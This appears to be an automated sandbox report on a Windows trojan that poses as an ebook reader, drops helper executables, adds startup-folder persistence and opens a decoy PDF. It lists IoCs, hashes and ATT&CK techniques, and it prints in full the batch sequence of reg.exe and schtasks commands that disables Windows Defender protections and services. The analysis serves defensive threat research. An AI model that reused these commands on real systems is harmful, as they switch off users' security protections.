daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4

Analysis

max time kernel
150s
max time network
145s
platform
windows10_x64
resource
win10v20201028
submitted
12-11-2020 14:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
Size

15.0MB
MD5

59a413614e91e86b933a42e4abdf1d43
SHA1

2d4ae51600e384dfcc8c054ff8c798055d008f87
SHA256

daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4
SHA512

1e771d3c37f9035f4a813e062c9327bc1a14e34a29aee4bced9613555bb684c581cf121a83f5daa0e4a7e1ac2b430c34b3f190171d4f8a50f4f89bfdb8b6a93c

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Executes dropped EXE 3 IoCs

Processes:

EbookReaderMui.exeEbookRplg.exeEbookNplg.exe

pid process

2932 EbookReaderMui.exe
2596 EbookRplg.exe
3012 EbookNplg.exe

pid	process
2932	EbookReaderMui.exe
2596	EbookRplg.exe
3012	EbookNplg.exe

Drops startup file 4 IoCs

Processes:

EbookRplg.exeEbookNplg.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\installui.exe	EbookRplg.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\installui.exe	EbookRplg.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InstallMui.exe	EbookNplg.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InstallMui.exe	EbookNplg.exe

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter	reg.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

Processes:

EbookNplg.exeEbookRplg.exeAcroRd32.exe

pid	process
3012	EbookNplg.exe
2596	EbookRplg.exe
2596	EbookRplg.exe
3012	EbookNplg.exe
3012	EbookNplg.exe
2596	EbookRplg.exe
2596	EbookRplg.exe
3012	EbookNplg.exe
2596	EbookRplg.exe
3012	EbookNplg.exe
3012	EbookNplg.exe
2596	EbookRplg.exe
3012	EbookNplg.exe
2596	EbookRplg.exe
3012	EbookNplg.exe
2596	EbookRplg.exe
3012	EbookNplg.exe
2596	EbookRplg.exe
3012	EbookNplg.exe
2596	EbookRplg.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

EbookNplg.exeEbookRplg.exe

description pid process

Token: SeDebugPrivilege 3012 EbookNplg.exe
Token: SeDebugPrivilege 2596 EbookRplg.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

3636 AcroRd32.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

EbookReaderMui.exeAcroRd32.exe

pid process

2932 EbookReaderMui.exe
3636 AcroRd32.exe
3636 AcroRd32.exe
3636 AcroRd32.exe
3636 AcroRd32.exe
3636 AcroRd32.exe

description	pid	process
Token: SeDebugPrivilege	3012	EbookNplg.exe
Token: SeDebugPrivilege	2596	EbookRplg.exe

pid	process
3636	AcroRd32.exe

pid	process
2932	EbookReaderMui.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe
3636	AcroRd32.exe

Suspicious use of WriteProcessMemory 330 IoCs

Processes:

daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exeEbookReaderMui.execmd.exe

description	pid	process	target process
PID 1048 wrote to memory of 2932	1048	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookReaderMui.exe
PID 1048 wrote to memory of 2932	1048	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookReaderMui.exe
PID 1048 wrote to memory of 2932	1048	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookReaderMui.exe
PID 1048 wrote to memory of 2596	1048	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookRplg.exe
PID 1048 wrote to memory of 2596	1048	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookRplg.exe
PID 1048 wrote to memory of 2596	1048	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookRplg.exe
PID 1048 wrote to memory of 3012	1048	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookNplg.exe
PID 1048 wrote to memory of 3012	1048	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookNplg.exe
PID 1048 wrote to memory of 3012	1048	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	EbookNplg.exe
PID 1048 wrote to memory of 3636	1048	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	AcroRd32.exe
PID 1048 wrote to memory of 3636	1048	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	AcroRd32.exe
PID 1048 wrote to memory of 3636	1048	daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe	AcroRd32.exe
PID 2932 wrote to memory of 3380	2932	EbookReaderMui.exe	cmd.exe
PID 2932 wrote to memory of 3380	2932	EbookReaderMui.exe	cmd.exe
PID 3380 wrote to memory of 3844	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 3844	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2888	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2888	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 1528	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 1528	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2052	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2052	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 652	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 652	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 3860	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 3860	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 3884	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 3884	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2168	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2168	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2208	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2208	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2816	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2816	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2316	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2316	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2040	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2040	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2348	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2348	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 1052	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 1052	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 3340	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 3340	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2740	3380	cmd.exe	schtasks.exe
PID 3380 wrote to memory of 2740	3380	cmd.exe	schtasks.exe
PID 3380 wrote to memory of 2132	3380	cmd.exe	schtasks.exe
PID 3380 wrote to memory of 2132	3380	cmd.exe	schtasks.exe
PID 3380 wrote to memory of 816	3380	cmd.exe	schtasks.exe
PID 3380 wrote to memory of 816	3380	cmd.exe	schtasks.exe
PID 3380 wrote to memory of 3868	3380	cmd.exe	schtasks.exe
PID 3380 wrote to memory of 3868	3380	cmd.exe	schtasks.exe
PID 3380 wrote to memory of 1228	3380	cmd.exe	schtasks.exe
PID 3380 wrote to memory of 1228	3380	cmd.exe	schtasks.exe
PID 3380 wrote to memory of 3776	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 3776	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2168	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2168	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2704	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 2704	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 4040	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 4040	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 3248	3380	cmd.exe	reg.exe
PID 3380 wrote to memory of 3248	3380	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe
"C:\Users\Admin\AppData\Local\Temp\daedd0017e4c1d2488d55bd08172c84420577c6c0a1d617d4c1c455870012bc4.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe
  "C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2932
- - C:\Windows\System32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\528A.tmp\52AB.tmp\52AC.bat C:\Users\Admin\AppData\Roaming\EbookReaderMui.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3380
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:3844
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:2888
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      PID:1528
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      PID:2052
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:652
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:3860
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      PID:3884
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      PID:2168
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      PID:2208
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:2816
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      PID:2316
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      PID:2040
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      PID:2348
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:1052
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:3340
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      PID:2740
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:2132
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:816
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:3868
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:1228
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      PID:3776
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      PID:2168
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:2704
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:4040
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:3248
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies service
      PID:2184
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies service
      PID:1564
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies service
      PID:1800
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies service
      PID:2352
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies service
      PID:2628
- C:\Users\Admin\AppData\Roaming\EbookRplg.exe
  "C:\Users\Admin\AppData\Roaming\EbookRplg.exe"
  2⤵
  - Executes dropped EXE
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2596
- C:\Users\Admin\AppData\Roaming\EbookNplg.exe
  "C:\Users\Admin\AppData\Roaming\EbookNplg.exe"
  2⤵
  - Executes dropped EXE
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3012
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Games-Aktuell-05-2020.pdf"
  2⤵
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:3636
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    PID:4236
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6E86A1BA060A12FE726C3E868F034FAE --mojo-platform-channel-handle=1636 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:5768
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4334E653362C82C2B6292F59CE7C4083 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4334E653362C82C2B6292F59CE7C4083 --renderer-client-id=2 --mojo-platform-channel-handle=1664 --allow-no-sandbox-job /prefetch:1
      4⤵
      PID:5804
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A79D67F800ACFB489D8F92A081ADBFC0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A79D67F800ACFB489D8F92A081ADBFC0 --renderer-client-id=4 --mojo-platform-channel-handle=2072 --allow-no-sandbox-job /prefetch:1
      4⤵
      PID:5992
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=256FD7FF49275B37ECAC1B8F07E74A7F --mojo-platform-channel-handle=2460 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:3492
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9E3AFAA007230817F33F97027B63A717 --mojo-platform-channel-handle=1812 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:4608
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F32550CAE32C03F12D226685D2A1639D --mojo-platform-channel-handle=2592 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:2260
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    PID:5084

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\528A.tmp\52AB.tmp\52AC.bat

MD5
665f21a9b6730aa08e62473e481b8c55

SHA1
717d52e75ac16bf032299828dd61c86af281eb43

SHA256
dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579

SHA512
b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e

Download Submit
C:\Users\Admin\AppData\Roaming\EbookNplg.exe

MD5
34a185bb131df034d21df734a479818d

SHA1
46e8c775b5224e78769753c70731e7e2ad6022f2

SHA256
